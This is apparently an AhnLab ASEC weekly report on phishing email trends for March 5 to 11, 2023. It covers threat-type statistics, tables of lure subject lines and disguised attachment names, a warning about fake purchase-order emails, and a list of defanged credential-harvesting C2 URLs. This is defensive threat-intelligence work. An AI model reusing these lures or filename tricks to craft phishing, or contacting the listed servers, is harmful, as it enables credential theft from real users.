ASEC Weekly Phishing Email Threat Trends (March 5th, 2023 – March 11th, 2023)

AhnLab Security Emergency response Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the week from March 5th, 2023 to March 11th, 2023 and provide statistical information on each type. Generally, phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineering methods. On a broader note, the act is a technical subterfuge that enables the threat actor to perform attacks such as information leaks, malware distribution, and fraud against various targets. The focus of this post will be on the fact that phishing attacks mainly occur through emails. We will also provide a detailed classification of various attack methods that are based on phishing emails. Furthermore, we will make an effort to minimize user damage by introducing new attack types that have never been found before and emails that require users’ caution, along with their keywords. The phishing emails covered in this post will only be those that have attachments. Emails that have malicious links in the body without attachments will be excluded.

Phishing Emails

During this week, the most prevalent threat type seen in phishing email attachments was FakePage with 84%. FakePages are web pages where the threat actor has imitated the screen layout, logo, and font of the real login pages or advertising pages, leading users to enter their account and password information. The input information is sent to the threat actor’s C2 server or used to induce users to access other fake websites. See <FakePage C2> below It was then followed by Trojan (7%) and Infostealers (5%) like AgentTesla and FormBook that leaks user credentials saved in web browsers, emails, and FTP clients. The .NET packer makes up most of Trojan, and this has been introduced in the previous blog post ‘Types of Recent .NET Packers and Their Distribution Trends in Korea‘ as Type 3 ‘VariantCrypter’. Aside from those mentioned above, Worm (2%), Exploit (2%), and Downloader (1%) types were detected.  The threat types using phishing email attachments and their order of prevalence are similar to the order of malware distribution published weekly in the <ASEC Weekly Malware Statistics>.

File Extensions in Phishing Emails

We have identified which file extensions were used by the threats above for the distribution of email attachments. FakePages were distributed or web pages script (HTML, HTM, SHTML) documents that must be executed with a web browser. Other malware, including Infostealer and downloader, came attached to emails with various file extensions including compressed files (ZIP, R09, RAR), IMG disk image files, and PDF document files.

Cases of Distribution

The following are distribution cases that occurred during the week from March 5th, 2023 to March 11th, 2023. The cases will be classified into fake login pages and malware types, including Infostealer, Downloader, Exploit, and Backdoor. The numbers in email subjects and attachment filenames are unique IDs and may vary depending on the email recipient. Distribution cases with Korean subjects were also found. These are cases that specifically targeted Korean users instead of propagating themselves globally using the identical English subject and text.

Case: FakePage

Email SubjectAttachment
DHL | Global | expressTransport_Doc_198290018.html
Re: PO 1015_INV (Invoice Request)Invoice Request PO 1015_INV.htm
New DHL Shipment Document Arrival Notice / Shipping Documents / Original BL, Invoice & Packing List(DHL) Original BL, PL, CI Copies.shtml
FedEx Service AlertsFedEx_**lee-Original_Document.htm
Quotation RequestPO 230310-21A.htm
Re: PO 10960PO10960 .htm
Payment sent On: Wednesday, March 8, 2023 4:17 a.m.Payment copy.pdf.html
New DHL Shipment Document Notice of Arrival / Shipping Documents / Original BL, Invoice & Packing List(DHL) Original BL, PL, CI Copies.htm
Fw: PO 107556 (Invoice Request)PO 107556Purchase Order .htm
You have received an essential encrypted company email – Remote
URGENT !!!Upgrade.html
New Order/PO # PUR120449-1Order_Inv PO # PUR120449-10.htm
Newly posted invoice , PL and BLInvoice.AWB#84248_pdf.htm
countec-sales2 You Have a delieverycopy.AWB #0675854897.htm
FW:Payment Confirmation for Open Invoices INV-019358 sent via one-drivePaid_invoice.html
Alerta ScotiaWeb: Comprobante Transaccion exitosa en Scotiabank ANGEL REYES MACARIO (868579)Comprobante-2023-02-28T151137.308.pdf
New Contract N0_938 : PURCHASE ORDER ATTACHEDPOrder2023.pdf
INQUIRY QT-0023817552QT_0023817552.html
✈[DHL] Notice on Import Tax Payment Deadline – (INV and AWB)DHLParcelShipment.html
Quotation QUO91019Quote.html
PO 197496 ( Invoice Request )PO_INV 197496 .htm
Payment Advice – Advice Ref:[922853603]payment.html
Payment Swift and InvoicePayment swift and invoice_ copy.shtml
New_fax_received_for_wong truefriendFax #2046.htm.htm
Re: URGENT / Request for Quotationorder specification.shtml
FedEx Service Alert.FedEx_Original_Document.htm
DHL Shipping Notification: Please kindly see shipping invoices for payment with deliveryPacking List.htm
Re: NEW PO – NH1200/1500scanPO.htm
PO 10120H5 (Invoice Request)PO 10120H5 Purchase Order .htm
RE: PFI PO 4899scan001.htm
Re: PO 1015 (Invoice Request)Purchase Order PO 1015.htm
Invoice – INV-00546INV-00546.shtml
You have received a direct deposit alert!83739832283382923893HHDJHSD83387HDSSDSH.xhtml
Your parcel has arrived urgent pick up needed today.parceldelivery.html
Your parcel has arrived urgent pick up needed today.AWB #8347630147.htm
Request for Quotation of : Ammunition Vehicle and Howitzer with Standard Tools and AccessoriesAmmunition Vehicle and Howitzer.html
New Order POH12-FA2306133PO H12-FA2306133.html
Quotation Request_**테크_20230223[G0170-PF3F-23-0223].html
Fwd: Fw: Fw: inquiryNew—inquiry.html
Request for quotationNew Order.html
Payment Confirmation.USD 63,530.50.pdf

Case: Malware (Infostealer, Downloader, etc.)

Email SubjectAttachment
Re: Re: RE: anniversaryKYC_HN70(Feb15).one
Re[4]: sexy picsgreatimg.gif.scr
RE: New Order OZM PO#10391, PO#10392-6New Order OZM PO#10391, PO#10392-6.rar
RFQ – Automotive Industry – 5 special drawing Item – SOP: 2023-2030 –RFQ – Automotive Industry.arj
Statement 000116057 TORKY SUPPLIES OFFICEStatement 000116057 TORKY SUPPLIES OFFICE
cool photo imortantprivatephotos.scr
saipan star/CTM USD50000USD50000.docx
Wire transfer receiotReceipt.doc
RE : PO FOR NEW ORDER ##2029 AND #5811order_2023.pdf.GZ
Re[5]: super smart photo very importantwild__images.pif
RFQ _Draft 08/03/
Re: InquiryQuote_3500001233.img
AW: PO-000001306PO-000001306.r09
New OrderNEW
PO NO.PO03238012,PO NO.PO03238012,.rar
Order-Dated 03-01-2023Enquiry2314.xls
DHL NotificationDHL Notification_pdf.rar
50% Remittance AdviseRemittance_Advise.xls
Re: RFQ # GC-20230203RFQ # GC-20230203L.r09
Revised Ghani Value Glass new order – SG Industries 100/24150###PI WIith Size is 6×5.xls
Fwd: Payment Release (GBS LOGISTICS)UPDATED SOA [REF CF005451] 2223.xls
RE: Reminder For Due PaymentPayment Advice 232-52126620A.xls
Quotation is Requestedpetronas 1.rar
Informe de pagopago de la ..factura 11-369013.PDF.img
Ref:103XXXXX Shipment of Original Documents.DHL SHIPMENT NOTIFICATION.r09
super wonderful photos just for yousex_action.jpg.scr
Your DHL Parcel Has
Supply of 3DC Project Marterials3DC Project Marterials.rar
Re[4]: super beautiful photobestscene.exe
FW: documentos solicitadosDocumentos66548864.pdf.img
Eccentric Plug valve Technical DataSheetTechnical DataSheet.pdf.iso
beautiful picturethepctrs.exe
smart picturesthephotos.gif.scr

The ASEC analysis team has selected keywords that users must look out for, based on the distribution cases above. If these keywords are included in the subject of the email, or if the same characteristics are found, users must exercise strict caution as they may be phishing emails from threat actors. 

Keywords to Beware of: ‘PO (Purchase Order)’

The keywords of this week are ‘PO (Purchase Order)’. Generally, when doing business with companies overseas, purchase orders (PO) with a list of purchases are sent. These purchase orders are assigned with numbers for business management. The threat actor impersonated the vendor to send a fake PO number along with a FakePage (HTML) file as an attachment. This file was disguised as a PDF login page and the email requests the user’s account credentials. The phishing page asks for the user’s ID and password with a blurry image of what can be assumed to be an order in the background, but users are advised to not input their ID and password as the information will be leaked to the threat actor’s server.

  • Threat actor’s server: hxxps[:]//experiaevents[.]in/italianpay/next.php

Phishing emails using the above server have been distributed to many users, and there have been more than 200 cases of access history to the server during the period from March 8th to March 17th. Although it isn’t certain whether the users’ credentials have been extorted, we assume that the majority of the recipients of the emails have opened the attachment.

FakePage C2 URL

When users enter their IDs and passwords on the login pages among the FakePages created by the threat actor, their information is sent to the attacker’s server. The list below shows the threat actor’s C2 addresses of fake login pages distributed during the week.

  • hxxps[:]//experiaevents[.]in/italianpay/next.php
  • hxxps[:]//formspree[.]io/f/xdovzjlo
  • hxxps[:]//submit-form[.]com/OIIpXOTl
  • hxxps[:]//daca[.]hostedwebsitesystem[.]com/vendor/phpunit/phpunit/src/Util/Log/index/index/spam/FedExpress[.]php
  • hxxps[:]//formspree[.]io/f/mjvdynwp
  • hxxps[:]//formspree[.]io/f/xwkjbjgo
  • hxxps[:]//formspree[.]io/f/myyakjqr
  • hxxp[:]//martinamilligan[.]co[.]business/ono/fdx[.]php
  • hxxps[:]//clinicacarlosgomes[.]med[.]br/wp-admin/kal/fte
  • hxxps[:]//formspree[.]io/f/mzbqgqyp
  • hxxps[:]//mallarg[.]tk/lp/fte[.]php
  • hxxps[:]//seafordrotary[.]org[.]au/Eppdff[.]php
  • hxxps[:]//k2-server[.]duckdns[.]org/roundbuk/pdf[.]php
  • hxxps[:]//cupertinochiropracticcenter[.]com/index/FedExpress[.]php
  • hxxps[:]//zenkoren[.]itigo[.]jp//cgi-bin/123/cloudlog[.]php
  • hxxps[:]//huntingfieldlodge[.]com[.]au/Aa/Excel22[.]php
  • hxxps[:]//formspree[.]io/f/mnqyznyy
  • hxxps[:]//mgffomento[.]com[.]br/wp-admin/dd/postdhll[.]php
  • hxxps[:]//holisticfacades[.]com[.]ng/wp-includes/aa/feed[.]php
  • hxxps[:]//dissertational-spee[.]000webhostapp[.]com/wp-admin/purchase/pdf[.]php

Attacks using phishing emails are disguised with content that can easily deceive users, such as invoices and tax payments, to induce users to access fake login pages or execute malware. Fake login pages are evolving by the second to closely resemble the original pages. The attackers pack malware in compressed file formats to escape the attachment scans of users’ security products. Users must practice strict caution and refer to recent cases of distribution to avoid being exposed to infection by malicious phishing emails. The ASEC analysis team recommends users follow the email security guidelines below.

  • Do not execute links and attachments in emails from unverified senders until they are proven to be credible.
  • Do not enter sensitive information such as login account credentials until the site is found to be reliable.
  • Do not execute attachments with unfamiliar file extensions until they are found to be reliable.
  • Use security products such as antimalware software.

According to the MITRE ATT&CK framework, phishing email attacks correspond to the following techniques.

  • Phishing for Information (Reconnaissance, ID: T1598[1])
  • Phishing (Initial Access, ID: TI1566[2])
  • Internal Spearphishing (Lateral Movement, ID:T1534[3])

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.


Tagged as:,,

0 0 votes
Article Rating
Notify of

Inline Feedbacks
View all comments

[…] post ASEC Weekly Phishing Email Threat Trends (March 5th, 2023 – March 11th, 2023) appeared first on ASEC […]


[…] as ‘PDF Online’ has been distributed recently. The fake webpage was mentioned in the ASEC Weekly Phishing Email Threat Trends uploaded in March 17th. The phishing email was impersonating a Korean company and was written in fluent Korean. As such, […]


[…] disguised as ‘PDF Online’ has been distributed recently. The fake webpage was mentioned in the ASEC Weekly Phishing Email Threat Trends uploaded in March 17th. The phishing email was impersonating a Korean company and was written in fluent Korean. As such, […]